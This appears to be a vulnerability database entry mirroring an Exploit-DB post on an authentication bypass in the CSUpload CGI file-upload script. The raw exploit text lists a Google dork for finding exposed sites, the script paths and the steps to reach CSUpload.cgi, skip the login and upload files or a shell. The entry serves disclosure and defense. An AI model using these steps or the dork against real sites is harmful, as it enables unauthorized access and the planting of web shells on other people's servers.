csUpload Script Site Authentication Bypass

vendor:

CSUpload

by:

Satanic2000

7,5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: CSUpload

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: None

CPE: cgiscript.net

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2014

csUpload Script Site Authentication Bypass

The vulnerability exists in the CSUpload script, which is a file uploader script. It allows an attacker to bypass authentication and gain access to the database, allowing them to upload files or shells. The vulnerability is present in the CSUpload.cgi script, which can be accessed by appending ?command=login to the URL.

Mitigation:

Ensure that authentication is properly implemented and enforced.

Source

Exploit-DB raw data:

# Exploit Title: ["csUpload Script Site" Authentication Bypass]
# Google Dork: [CSUpload.cgi?command=]
# Date: 4/9/2014
# Exploit Author: Satanic2000
# Vendor Homepage: http://www.cgiscript.net
# Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
# Version: 
# Tested on: linux
# www.Site.com/[path]/CSUpload/CSUpload.cgi
# [path] : /cgi-script/     or /cgi-bin/ or None

# Example:

# 1-  http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login

# 2- Bypass Authentication  http://localhost/cgi-bin/CSUpload/CSUpload.cgi

# 3- Select Database Select Databases And Upload (File,Or Shell)

# Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend